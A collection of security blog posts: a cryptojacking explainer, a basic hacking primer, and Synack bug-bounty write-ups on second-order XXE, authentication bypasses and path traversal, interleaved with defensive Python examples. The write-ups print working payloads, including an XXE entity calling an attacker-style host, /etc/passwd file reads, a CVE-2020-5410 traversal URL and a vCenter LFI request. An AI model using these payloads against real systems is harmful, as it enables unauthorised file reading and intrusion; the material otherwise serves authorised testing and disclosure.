Signs that you may be a victim of cryptojacking include a noticeable drop in device performance, overheating batteries, devices or routers crashing or dropping off the network for lack of available processing power, and unexpectedly high electricity bills. The biggest impact is cost: the victim, whether a person or a business, pays for the hardware wear and the electricity while the attacker keeps the coins.

The main stages of crypto jacking:

  • Hack an asset to embed the mining script
  • Run the cryptocurrency mining script
  • Mining begins: the script computes hashes on the victim’s hardware
  • Results are submitted to the attacker’s mining pool
  • The attacker receives the cryptocurrency rewards
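A host-side triage of the symptoms listed above, as an added Python illustration that is not part of the OFFICIAL HACKER post: it runs over constructed ps-style lines and flags the indicators the text describes (an XMRig-type miner name, a stratum pool connection, a Monero payout address, a binary running from a temp directory, and sustained high CPU with no explanation). The miner names, URL schemes, address format and 80% threshold are assumptions to tune locally.

```python
"""Host-side cryptojacking triage over constructed process-list lines.

Added illustration, not code from the OFFICIAL HACKER post. The indicators
are the ones the post describes (XMRig-style miners, pool connections, Monero
payouts, abnormal CPU use). Assumptions: the miner names and stratum URL
schemes listed below, a Monero standard address of 95 base58 characters
starting with '4', and the 80% CPU threshold; tune all of them locally."""
import re

MINER_NAMES = ("xmrig", "minerd", "cpuminer", "xmr-stak")
STRATUM_RE = re.compile(r"stratum\+(?:tcp|ssl)://[\w.-]+:\d+", re.I)
MONERO_ADDR_RE = re.compile(r"\b4[1-9A-HJ-NP-Za-km-z]{94}\b")
TEMP_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
CPU_THRESHOLD = 80.0  # percent

FAKE_ADDR = "4" + "A" * 94  # constructed, syntactically Monero-shaped address

# Constructed `ps -eo pid,pcpu,args`-style output.
SAMPLE_PS = f"""\
  PID %CPU COMMAND
  412  0.3 /usr/sbin/sshd -D
 1337 97.8 /tmp/.x/kthreadd -o stratum+tcp://pool.example:3333 -u {FAKE_ADDR}
 2048 45.0 python3 /opt/app/worker.py
 2311 99.0 xmrig --donate-level 1
 3001 95.2 /usr/bin/java -jar /opt/app/report.jar
"""


def parse_ps(text: str) -> list:
    """Turn ps output into rows of pid, cpu percent and command line."""
    rows = []
    for line in text.splitlines()[1:]:  # skip the header
        m = re.match(r"\s*(\d+)\s+([\d.]+)\s+(.*)$", line)
        if m:
            rows.append({"pid": int(m.group(1)), "cpu": float(m.group(2)), "cmd": m.group(3)})
    return rows


def miner_indicators(cmd: str) -> list:
    """Static indicators in a command line; order is fixed so output is stable."""
    found = []
    lowered = cmd.lower()
    if any(name in lowered for name in MINER_NAMES):
        found.append("known miner name")
    if STRATUM_RE.search(cmd):
        found.append("stratum pool URL")
    if MONERO_ADDR_RE.search(cmd):
        found.append("monero address")
    if cmd.lstrip().startswith(TEMP_DIRS):
        found.append("binary in temp dir")
    return found


def triage(ps_text: str, cpu_threshold: float = CPU_THRESHOLD) -> list:
    """Flag processes with miner indicators, and high-CPU processes without any
    for manual review (a busy JVM is not a miner; an unknown binary might be)."""
    hits = []
    for row in parse_ps(ps_text):
        indicators = miner_indicators(row["cmd"])
        if not indicators and row["cpu"] >= cpu_threshold:
            indicators.append("high cpu, no known indicator: verify manually")
        if indicators:
            hits.append({**row, "indicators": indicators})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_PS):
        print(f"pid {hit['pid']:>5} cpu {hit['cpu']:>5}% {hit['indicators']}")
```

The renamed binary in /tmp is the realistic case: it carries no miner name, so the pool URL and payout address on its command line are what give it away, and a process that hides those too still shows up through the CPU rule. Browser-based (drive-by) mining leaves no process of its own; for that, look at the browser’s CPU use and its outbound WebSocket connections instead.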

According to a report by the security company Kaspersky, 432,171 users encountered miners on their devices in the first quarter of 2021, 200,045 of them in March alone. The number of unique modifications of miners more than quadrupled, from 3,815 to 16,934; a unique modification is a change to a miner’s code to mine a new currency or adapt to new systems. In the first quarter of 2021, Kaspersky researchers saw 23,894 new modifications of miners.

The post What do you mean by Crypto Jacking? appeared first on OFFICIAL HACKER.

Hacking - Simply Explained

By: Gokul G
Hacking - Simply Explained

Not so long ago, the word "hacker" was used to describe a person who loves to experiment with technology.

Now, the word "hacker" is used to describe a person who illegally uses another person's computer for illicit purposes without that person's knowledge. For that, special thanks go to the media, which has consistently used the term only for the bad guys (if you couldn't tell, I'm being sarcastic).

The Problem

We all know how complex computers have become in recent years, and unfortunately that complexity gives people with bad motives more opportunities to misuse them.

It is not always possible for the engineers who build a system to spot every weak point in their code. That is precisely what hackers are good at: they look for these weak spots and use them to cause damage.

I should also add that not all hackers are bad. Some do so for good intentions, such as helping computer engineers in identifying weak spots and fixing issues.

Types of Hackers

Now that you know what hacking means, there are different types of hackers out there:

  1. White Hat Hackers: These hackers follow ethical standards. They are legally permitted to test a computer system, and their main goal is to find weak spots and improve its security.

  2. Black Hat Hackers: These people take part in criminal activity in order to exploit computer systems for their own benefit.

  3. Grey Hat Hackers: They hack with good intentions, but they may not do everything in a legal or ethical way.

Why Do People Hack?

Here are the top reasons why hackers do what they do.

  • Quick Cash: Stolen bank card details and the sale of personal data online are two common sources of motivation for hackers.

  • Improved Security Systems: This is done by white hat hackers for moral reasons. They break into systems to check for security flaws.

  • Hacktivism: What does that mean? It is when people hack other computer systems for political reasons.

  • Just for Fun: Some people consider hacking a hobby.

What Happens When a Computer is Hacked?

Hackers can steal your identity and gain access to your personal information. They might then use your own accounts to take part in illegal activity.

How to Protect Yourself Against Hackers

If a professional hacker wants to get into a device, he or she will find a way to break in one way or another; it is only a question of time. The only thing you can do is make it as hard as possible for them. Here are some tips on how to do that:

  1. Install the latest updates on your computer, including for your anti-virus software.

  2. Create a different password for each account you have.

  3. Only use secure WiFi connections.

  4. Back up your PC data regularly.

I hope that now you have a good understanding of what hacking is. Technology can be used for good and bad. Make sure you use it for good!

Exploits Explained: Second Order XXE Exploitation

Kuldeep Pandya is a member of the Synack Red Team. You can find him on Twitter or his blog.

This writeup is about my recent discovery of a Second Order XXE that allowed me to read files stored on the web server.

One morning, a fresh target was onboarded and I hopped onto it as soon as I received the email. The scope listed two web applications along with two Postman collections. I prefer Postman collections over web apps, so I loaded the collections with their environments into my Postman.

After sending the very first request, I noticed that the application was using a SOAP API to transfer the data. I tried to perform XXE in the SOAP body, but the application threw an error saying "DOCTYPE is not allowed".

Here, we cannot perform XXE as DOCTYPE is explicitly blocked.

Upon checking all the modules one by one, I came across a module named NormalTextRepository in the Postman collection which had the following two requests:

  • saveNormalText
  • GetNamedNormalText

After sending the first saveNormalText request and intercepting it in Burp Suite, I found out that it contained some HTML-encoded data that looked like this:

Upon decoding, the data looked like this:

<?xml version="1.0"?>
<normal xmlns="urn:hl7-org:v3" xmlns:XX="http://REDACTED.com/REDACTED"><content XX:statu

This quickly caught my attention. This was XML data being passed inside the XML body in a SOAP request (Inception vibes).

I went on to try XXE here as well. For this, I copy-pasted a simple blind XXE payload from PortSwigger:

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com/XXETEST"> %xxe; ]>

I used Synack’s provided web server to test for this. Upon checking its logs, I found there indeed was a hit for the /XXETEST endpoint.

This was still a blind XXE, and I had to turn it into a full XXE in order to receive a full payout. I tried different file read payloads from PayloadsAllTheThings and HackTricks, but they did not seem to work in my case.

For me, the XXE was not reflected anywhere in the response. This is why it was comparatively difficult to exploit.

After poking around for a while, I gave up on the idea of a full XXE and went on to check whether an internal port scan was possible, since I was able to send HTTP requests.

I sent the request to Burp Suite's Intruder and fuzzed the ports from 1 to 1000. The payload for that looked like the following:

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:§1§/XXETEST"> %xxe; ]>

However, the Intruder results didn't make any sense to me. All the ports I fuzzed showed random time delays.

I lost all hope and was about to give up on this XXE once again. Then a thought struck, “If this data is being saved in the application, it has to be retrievable in some way as well.” I checked the other GetNamedNormalText request in this module and instantly felt silly. This request retrieved the data that we saved from the first saveNormalText request.

I used the following XXE file read payload and saved the data:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>

I then sent the second GetNamedNormalText request to retrieve the saved data. And in the response, I could see the contents of the /etc/passwd file!

This was enough for a proof of concept. However, looking at the JSESSIONID cookie, I could tell that the application was built using Java. And in Java applications, if you just provide a directory instead of a file, it will list the contents of that directory and return them.

To confirm this theory, I just removed the /passwd portion from the above file read payload. The updated payload looked like this:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY example SYSTEM "/etc"> ]>

Upon saving the above payload and retrieving it using the second request, we could see the directory listing of the /etc directory!

I sent it to Synack and they happily triaged it within approximately 2 hours.
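The lesson for defenders in this write-up is that the SOAP layer's DOCTYPE check protected only the outer document; the stored "normal text" was parsed a second time on retrieval, by a parser that had not been locked down. The following Python example is added here and is not code from the write-up or from the target application. It models the saveNormalText/GetNamedNormalText pair with a hypothetical NormalTextRepository class that parses stored XML only when it is read back, and contrasts a parser that resolves SYSTEM entities with one that refuses any DOCTYPE. The file it reads is a constructed temporary file standing in for /etc/passwd, and the payload is constructed in the shape of the one above, with the entity referenced in the content.

```python
import os
import tempfile
from xml.parsers import expat

# Constructed stand-in for the file the real payload targeted (/etc/passwd);
# the example never reads real system files.
SECRET = "constructed-secret-value-123"
BENIGN_DOC = b'<?xml version="1.0"?><normal><content>hello</content></normal>'


def write_constructed_secret() -> str:
    """Create a throwaway file standing in for /etc/passwd and return its path."""
    fd, path = tempfile.mkstemp(prefix="xxe-demo-", suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write(SECRET + "\n")
    return path


def payload_for(path: str) -> bytes:
    """Second-order XXE payload in the shape of the write-up's saveNormalText body:
    an external general entity declared in the DOCTYPE and referenced in the
    stored content (constructed for this example, not the original payload)."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<!DOCTYPE foo [<!ENTITY example SYSTEM "{path}"> ]>'
        "<normal><content>&example;</content></normal>"
    ).encode()


def parse_resolving_entities(doc: bytes) -> str:
    """The vulnerable sink: a parser that resolves SYSTEM entities by opening
    whatever path the DOCTYPE names, then returns the document's text."""
    parts = []
    parser = expat.ParserCreate()

    def resolve(context, base, system_id, public_id):
        # Pull the external entity in and parse it as part of the document:
        # exactly the behaviour that turns a stored DOCTYPE into a file read.
        child = parser.ExternalEntityParserCreate(context)
        with open(system_id, "rb") as fh:
            child.Parse(fh.read(), True)
        return 1

    parser.ExternalEntityRefHandler = resolve
    parser.CharacterDataHandler = parts.append
    parser.Parse(doc, True)
    return "".join(parts)


def parse_rejecting_doctype(doc: bytes) -> str:
    """The hardened parser: any DOCTYPE aborts the parse, mirroring the
    'DOCTYPE is not allowed' error the SOAP layer already produced."""
    parts = []
    parser = expat.ParserCreate()

    def forbid(name, system_id, public_id, has_internal_subset):
        raise ValueError("DOCTYPE is not allowed")

    parser.StartDoctypeDeclHandler = forbid
    parser.CharacterDataHandler = parts.append
    parser.Parse(doc, True)
    return "".join(parts)


class NormalTextRepository:
    """Hypothetical model of the saveNormalText / GetNamedNormalText pair:
    documents are stored verbatim and parsed only when read back, so the
    parser used at read time decides whether the stored payload fires."""

    def __init__(self, parse):
        self._parse = parse
        self._store = {}

    def save_normal_text(self, name: str, doc: bytes) -> None:
        self._store[name] = doc

    def get_named_normal_text(self, name: str) -> str:
        return self._parse(self._store[name])


if __name__ == "__main__":
    path = write_constructed_secret()
    try:
        vulnerable = NormalTextRepository(parse_resolving_entities)
        vulnerable.save_normal_text("note", payload_for(path))
        print("vulnerable read-back:", vulnerable.get_named_normal_text("note").strip())
        hardened = NormalTextRepository(parse_rejecting_doctype)
        hardened.save_normal_text("note", payload_for(path))
        try:
            hardened.get_named_normal_text("note")
        except ValueError as err:
            print("hardened read-back:", err)
    finally:
        os.remove(path)
```

The point of the design is that the DOCTYPE rejection lives inside the parser rather than in the request handler, so it applies wherever that parser is used, including the read-back path that the original application left unprotected. Disabling entity resolution alone (the default in current Python) would also stop the file read, but rejecting the DOCTYPE outright matches the behaviour of the outer layer and fails loudly instead of silently dropping the entity.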

The post Exploits Explained: Second Order XXE Exploitation appeared first on Synack.

Exploits Explained: 5 Unusual Authentication Bypass Techniques

Ozgur Alp is a member of the Synack Red Team and has been awarded SRT of the Year 2021, Most Trusted Hacker 2021, Mentor of the Year 2022 and SRT Grand Champion for 2019, 2020 and 2021.

Authentication bypass vulnerabilities are common flaws that exist in modern web applications—but they’re not always easy to find. 

New authentication methods are working wonders to boost cybersecurity at many organizations. While tools like single sign-on (SSO) are often an improvement over old ways of logging users in, these technologies can still contain critical vulnerabilities. Whether it’s business logic errors or some other software flaw, it takes a keen eye to comb through all the complexity.

In this blog, I’ll cover five real-world authentication bypass techniques that I have found in the Synack Platform throughout my time as a member of the Synack Red Team. 

Example #1 – Refresh Token Endpoint Misconfiguration

In this case, once a user logged into the application with valid credentials, the application created a Bearer authentication token that was used elsewhere in the application. This token expired after some time. Just before expiration, the application sent a request to the back-end endpoint /refresh/tokenlogin containing the still-valid token in the headers and a username parameter in the HTTP body.

Further testing revealed that deleting the Authorization header from the request and changing the username parameter in the HTTP body produced a new valid token for the supplied username. Using this flaw, an unauthenticated attacker could generate an authentication token for any user just by supplying their username.

Example #2 – Improper SSO Configuration

Most applications use SSO systems because they are easier to manage securely than juggling many authentication portals. But simply using SSO does not automatically protect the system: the SSO configuration must be secured as well.

Here, one application used the Microsoft SSO system for authentication. When visiting the internal.redacted.com URL, the web browser was redirected to the SSO system.

At first sight it seemed secure, but analysing the back-end requests showed that the application returned an unusually large Content-Length (over 40,000 bytes!) on the redirect response.

Why would an application do this? It was misconfigured. The application was leaking its internal responses with every request while redirecting the user to the SSO, so it was possible to tamper with the responses, change the 302 Found status to 200 OK and delete the Location header, giving access to the whole application.

It was also possible to automate this by adding Match & Replace rules in Burp Suite that delete the header and change the values automatically.

Example #3 – CMS Based Access Problems

Content management systems (CMS) like WordPress, Drupal and Hubspot need to be securely configured as well, lest they introduce vulnerabilities in your organization.

One popular CMS platform, Liferay, was used in an internal application in one case I examined. The application only had a single login page accessible without authentication, and all other pages were restricted on the application UI.

For those not familiar with Liferay, the CMS uses portlets for application workflows, each identified by a numeric p_p_id parameter. In that application, it was possible to access the login portlet by changing the parameter to the value 58. On the normal login page, only the login form was accessible. However, by accessing the portlet directly, it was possible to reach the Create Account functionality, which allowed self-registration and therefore access to internal applications without proper authorization.

Please note that while older Liferay versions used this workflow, the latest version uses portlet names instead of numeric ids. It is still possible to access other portlets by changing the names as well.

Example #4 – Usage of Example JWT Tokens

JWT tokens, or JSON Web Tokens, are popular in new web applications. But while the format includes a signature mechanism by default, the back-end server's validation of the token must be configured securely too.

I worked on an assignment where SSO authentication was used for their internal applications. When visited directly, the application redirected the user to the Microsoft SSO web page. So far, so good. 

However, some JS files were accessible without authentication. Testing revealed that the application used JWT tokens sent by the Microsoft SSO system after a secure login. On the back end there was a security misconfiguration: it did not check whether the JWT token had been generated for that specific application; instead, it accepted any JWT token that carried a valid signature. So, using an example JWT token from Microsoft's website, filled with generic values, it was possible to access the internal endpoints, leaking the company's data.
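Examples #1 and #4 both come down to what the back end trusts: in #1 the username in the request body, in #4 a signature with no check of which application the token was minted for. As an added example (not code from the post or from any of the applications it describes), the Python block below implements both checks with the standard library: a verifier that rejects a validly signed token issued for another audience or already expired, and a refresh handler that takes the subject from the presented token rather than from the body. The HS256 key, the audience identifier api://internal-app-example and the function names are assumptions made for this example; a real Microsoft-issued token would be RS256 and verified against the identity provider's published keys, but the claim checks are the same.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed signing key; a real deployment would hold the IdP's public key
# (RS256) rather than a shared HMAC secret. HS256 keeps the example offline.
SIGNING_KEY = b"constructed-demo-key-not-for-real-use"
OUR_AUDIENCE = "api://internal-app-example"  # assumed identifier for this app


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(subject: str, audience: str, lifetime: int = 3600, now=None) -> str:
    """Mint an HS256 JWT (header.payload.signature) for the given audience."""
    now = int(time.time()) if now is None else now
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    claims = {"sub": subject, "aud": audience, "iat": now, "exp": now + lifetime}
    body = _b64url(json.dumps(claims).encode())
    sig = hmac.new(SIGNING_KEY, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def verify_signature_only(token: str) -> dict:
    """The misconfiguration from Example #4: a valid signature is all it checks,
    so any token the issuer ever signed, for any application, is accepted."""
    header, body, sig = token.split(".")
    expected = hmac.new(SIGNING_KEY, f"{header}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig)):
        raise PermissionError("bad signature")
    return json.loads(_b64url_decode(body))


def verify_token(token: str, audience: str = OUR_AUDIENCE, now=None) -> dict:
    """Hardened check: signature first, then the claims that bind the token to
    this application (aud) and to this moment (exp)."""
    claims = verify_signature_only(token)
    now = int(time.time()) if now is None else now
    if claims.get("aud") != audience:
        raise PermissionError("token was not issued for this application")
    if claims.get("exp", 0) <= now:
        raise PermissionError("token expired")
    return claims


def refresh_token(authorization_header, body_username: str, now=None) -> str:
    """Hardened /refresh endpoint for Example #1: the identity comes from the
    presented token, never from the username in the request body, and a
    request without a valid bearer token gets nothing."""
    if not authorization_header or not authorization_header.startswith("Bearer "):
        raise PermissionError("missing bearer token")
    claims = verify_token(authorization_header[len("Bearer "):], now=now)
    if body_username != claims["sub"]:
        raise PermissionError("username does not match authenticated subject")
    return issue_token(claims["sub"], OUR_AUDIENCE, now=now)


if __name__ == "__main__":
    mine = issue_token("alice", OUR_AUDIENCE)
    foreign = issue_token("alice", "api://some-other-app")  # signed, wrong audience
    print("signature-only accepts foreign token:", verify_signature_only(foreign)["aud"])
    try:
        verify_token(foreign)
    except PermissionError as err:
        print("hardened verifier:", err)
    try:
        refresh_token(None, "bob")
    except PermissionError as err:
        print("refresh without token:", err)
    print("refresh for own subject works:", verify_token(refresh_token("Bearer " + mine, "alice"))["sub"])
```

The refresh handler still accepts a username in the body, as the original endpoint did, but treats it only as something to compare against the authenticated subject; dropping the Authorization header or changing the username now fails closed instead of minting a token for someone else.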

Example #5 – Changing Authentication Type to Null

In this instance, the application sent all requests as base64-encoded XML in the HTTP POST data. On the login mechanism, it sent the username in a parameter named alias and the password in one named scode. The value inside the scode parameter was hashed; a quick analysis showed it was the MD5 of the supplied password. There was another interesting sign in the request: scode had a type attribute with the value 2.

I tried assigning the value 1, which made the server accept a cleartext password. It worked! So brute-forcing with cleartext values was possible. Not a big deal, but it was a sign that I was on the right path. What about assigning a null value, or other values such as -1, 0 or 9999999999? Most of them returned an error code, except the value 0. I tried several things with the attribute set to 0 but had no luck until I sent an empty password value.

I realized it was possible to access any account by simply supplying the usernames and empty passwords. It turned out to be quite a big bug. 

Conclusion

Complex authentication mechanisms can fall prey to undiscovered attack vectors, especially on applications prone to business logic flaws. Because automatic scanners mostly fail to key into these kinds of vulnerabilities, human power is still needed to find them. Given the complexity of modern software environments, no single security researcher can pick up on all possible vulnerabilities or attack vectors. On-demand security testing with a vetted community of researchers is the best way to combine everyone’s unique knowledge to find the vulnerabilities that matter. 

You can find Ozgur on Twitter, LinkedIn and Medium.

The post Exploits Explained: 5 Unusual Authentication Bypass Techniques appeared first on Synack.

Path Traversal Paradise

By Kuldeep Pandya


Hi, guys!

This blog will be about all the different kinds of Path Traversal and Local File Inclusion vulnerabilities that I have found on the Synack Red Team.

After hacking on the Synack Red Team for approximately 9 months, I came to realise that Path Traversal and LFI-like vulnerabilities are very common. I reported a few authenticated vulnerabilities and a few unauthenticated ones, and I will try to cover both kinds.

Before moving forward, I’d like to list all my Path Traversal/LFI submissions.

Submissions

Submission                                                      Status
Path Traversal Vulnerability Leads To Source Code Disclosure    Accepted
Local File Inclusion in VMWare VCenter running at [REDACTED]    Accepted
Spring Boot Path Traversal – CVE-2020-5410                      Accepted
Local File Inclusion In download.php                            Accepted
Local File Inclusion In download.php                            Rejected (duplicate of my previous report)
Local File Inclusion In download.php                            Rejected (duplicate during Initial Launch Period)
Path Traversal Allows To Download Licence Keys                  Accepted

Descriptions

Path Traversal Vulnerability Leads To Source Code Disclosure

This was the very first Path Traversal vulnerability that I found on the Synack Red Team. Also, even though I was pretty new to the platform and to bug bounties in general, this report was selected during the Initial Launch Period, when the best write-up is chosen, not necessarily the first valid report.

After logging in, the application provided a number of sections like manage vendors, manage inventory, etc., each with a number of functionalities.

Upon further inspecting these sections, I came across an interesting functionality that involved importing data. The file was named DataImport.view.

I tried getting RCE by uploading an ASPX web shell and it actually worked! Reported it and that report got accepted too! However, that’s a different story. We want to discuss Path Traversals here and not RCEs.

So, after successfully uploading a file, we were given the functionality to read the file back.

After clicking the "ReadFile" button, the file name field was filled with the currently uploaded file name by default. However, we had the ability to change it.

Now, I just had to provide a valid file name. For this, I used Auth.aspx, the file the login request was sent to. I could be sure it existed because the login request went to this file and it resided in the webroot.

So, I tried to do path traversal using payloads like ../Auth.aspx and ../../Auth.aspx etc.

And after three ../ sequences, the file was actually returned!

The response looked like this:

The file was broken because some sort of XML parsing was done on it. I still went ahead and reported it, because it was still a path traversal issue and it disclosed source code.

I could have done more creative things here, like pulling more sensitive files, but I stopped because very limited time was left in the Initial Launch Period. I initially did not care much about this vulnerability, as I had already reported an RCE there, but I quickly put together a report in under 15 minutes with all my PoCs, and it was still selected as the best write-up during the Initial Launch Period.

Local File Inclusion in VMWare VCenter Running at [REDACTED]

This was the classic VMWare VCenter /eam/vib LFI vulnerability.

The /eam/vib endpoint in VMWare VCenter instances takes a parameter named id in the GET request. The value of this id parameter is a file name that the VCenter instance retrieves and returns in the response.

There are already many resources regarding this particular vulnerability and I do not think much is to be said about it in this particular article.

I used the following payload to retrieve the hosts file off the remote server:

https://[REDACTED]/eam/vib?id=C:/WINDOWS/System32/drivers/etc/hosts

There were some IP-to-host mappings in the hosts file, which I thought was enough for impact, but with creativity more could have been achieved.

I reported the issue during the Initial Launch Period, and this was selected.

Spring Boot Path Traversal — CVE-2020-5410

This was a known vulnerability in the Spring Boot Cloud Config server. For the PoC, I referred to this article: http://www.jrasp.com/case/CVE-2020-5410.html

That article talks in detail about the vulnerability and also explains the source code.

I did not read that much and simply took the PoC from there and used it on the target that I had for testing. And the exploit worked!

I used the same payload as in the PoC which is:

https://[REDACTED]/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development

The above payload retrieves the /etc/passwd file.

However, this was Java, and one odd thing about Java Path Traversals/LFIs is that if you specify a directory instead of a file, it will actually list the contents of that directory.

So, for example, if I did not know what files were in the /etc directory, I would simply use the following payload to list all the files:

https://[REDACTED]/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%23foo/development

This is just the previous payload with the trailing /passwd removed. Now, we are just listing the contents of the /etc directory.

I used this behaviour to list the contents of the root directory of the affected Linux server. In the root directory, I found a file named application.jar, which was potentially the source code of the running Spring Boot Cloud Config server.

Also, the root directory had a .dockerenv file, so I was quite sure I was in a Docker container.

However, the Synack Red Team has a stop-and-report policy, according to which we are not supposed to do post-exploitation.

I reported the issue during the 8-hour Initial Launch Period. Nobody else checked for this particular vulnerability, so mine was the only report during that time.

Local File Inclusion in download.php

I have already discussed this vulnerability in my previous article, which you can find here: Local File Inclusion In download.php

Path Traversal Allows To Download Licence Keys

This path traversal was also very interesting. This was in a custom-built application and it did not require any authentication.

When we visited the webroot, the web application redirected us to the login page.

The login page was custom built and showed a brand logo, so I cannot show you the screenshots.

Upon visiting the login page, a request to the /web/product_logo endpoint was sent. The request contained a GET parameter named logo.

Overall, the request URL looked like this:

https://[REDACTED]/web/product_logo?logo=logo.png

The parameter logo took a file name as the input and returned that particular file in the response. In this case, it was logo.png.

Now, since this is functionality that reads files, there might be an LFI/Path Traversal here. So, I changed the file name to other file names like index.html, index.php, index.js, etc. However, none of them worked.

So, I ran ffuf hoping to discover more files, but it was a failure. I used the raft-small-files-lowercase.txt wordlist from SecLists.

I did not know the underlying technology, so it was quite painful to enumerate files.

However, I knew it was a Windows box because of the case-insensitive directory structure. What that means is that on Windows, WinDows and Windows refer to the same directory or file, as the file system is not case sensitive. During my recon I received the same response for /web and /Web, so I was quite sure it was a Windows box.

There are other ways to determine this too but I decided to assume it was Windows.

As in my past submissions, I decided to read the C:/WINDOWS/System32/drivers/etc/hosts file on the remote server.

So, I used a path traversal payload and the final URL looked like this:

https://[REDACTED]/web/product_logo?logo=../WINDOWS/System32/drivers/etc/hosts

However, one ../ sequence did not work, so I kept increasing the number of ../ sequences.

After 10 ../ sequences, I finally hit the hosts file and the server returned it.

The final payload looked like this:

https://[REDACTED]/web/product_logo?logo=../../../../../../../../../../WINDOWS/System32/drivers/etc/hosts

Although this was enough for PoC, I decided to dig deeper with this path traversal.

While I was fuzzing the application, I encountered an error that disclosed the full path of the webroot.

I ran ffuf again, but now against the webroot of the server using the path traversal I had found. This way, I was able to enumerate a file named LICENSE that contained the application's license keys.

I reported the issue with all my findings and my report was selected during the Initial Launch Period.
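Every traversal in this post is the same server-side mistake: a user-supplied file name joined onto a base directory and handed to the file system without the result being resolved and checked, with the Spring Cloud Config case adding double URL encoding (%252F) and the Java cases returning directory listings. The following Python example is added here and is not code from the post or from any application it describes. resolve_under() decodes the name until it is stable, rejects absolute paths and any .. segment, resolves the result on disk (which also catches symlinks) and refuses anything that lands outside the base directory or on a directory. It builds a constructed web root in a temporary directory; every file name in it is constructed, and the request shapes it rejects are the ones shown in the post.

```python
import os
import tempfile
from urllib.parse import unquote


class TraversalRejected(ValueError):
    """Raised for any request that must not be mapped onto the file system."""


def fully_decode(name: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing. '%252F' only becomes '/'
    on the second round, which is how a single-decode check misses the
    CVE-2020-5410 payload; too many layers is itself suspicious."""
    for _ in range(max_rounds):
        decoded = unquote(name)
        if decoded == name:
            return name
        name = decoded
    raise TraversalRejected("too many encoding layers")


def resolve_under(base_dir: str, requested: str) -> str:
    """Map a user-supplied file name to a path that must stay inside base_dir."""
    name = fully_decode(requested)
    if "\x00" in name:
        raise TraversalRejected("null byte in file name")
    name = name.replace("\\", "/")  # Windows accepts both separators
    if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        raise TraversalRejected("absolute paths are not allowed")
    if ".." in name.split("/"):
        raise TraversalRejected("parent-directory segment in file name")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    # realpath has resolved '.', '..' and symlinks, so this is the real answer
    # to "does it stay under the web root" (case-insensitive on Windows).
    if os.path.commonpath([base, target]) != base:
        raise TraversalRejected("resolved path escapes the web root")
    if os.path.isdir(target):
        # A Java file: URL on a directory returns a listing; never serve one.
        raise TraversalRejected("directories are not served")
    return target


def read_file_under(base_dir: str, requested: str) -> bytes:
    """What a hardened /web/product_logo?logo=... handler would call."""
    with open(resolve_under(base_dir, requested), "rb") as fh:
        return fh.read()


def make_constructed_webroot() -> str:
    """Constructed layout: <tmp>/web/logo.png is served, <tmp>/secret.txt is
    one level above the web root and must stay unreachable."""
    root = tempfile.mkdtemp(prefix="traversal-demo-")
    webroot = os.path.join(root, "web")
    os.mkdir(webroot)
    with open(os.path.join(webroot, "logo.png"), "wb") as fh:
        fh.write(b"\x89PNG-constructed")
    with open(os.path.join(root, "secret.txt"), "w") as fh:
        fh.write("constructed secret above the web root\n")
    return webroot


# Request shapes taken from the post, all of which must be rejected.
REJECTED_SAMPLES = [
    "../secret.txt",
    "..%252F..%252Fsecret.txt",
    "../../../../../../../../../../WINDOWS/System32/drivers/etc/hosts",
    "C:/WINDOWS/System32/drivers/etc/hosts",
    "/etc/passwd",
    "%2e%2e/secret.txt",
    "",  # empty name resolves to the web root itself, a directory
]


if __name__ == "__main__":
    webroot = make_constructed_webroot()
    print("logo.png ->", read_file_under(webroot, "logo.png"))
    for sample in REJECTED_SAMPLES:
        try:
            read_file_under(webroot, sample)
        except TraversalRejected as err:
            print(f"{sample!r:70} rejected: {err}")
```

Rejecting .. segments before touching the file system is deliberate belt-and-braces: the realpath check alone would also catch every sample, but failing early on an obviously hostile name keeps the file system out of the error path and gives a clearer log line for detection.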

Thanks for the read. 🙂

Kuldeep Pandya

You can reach out to me at @kuldeepdotexe.

The post Path Traversal Paradise appeared first on Synack.
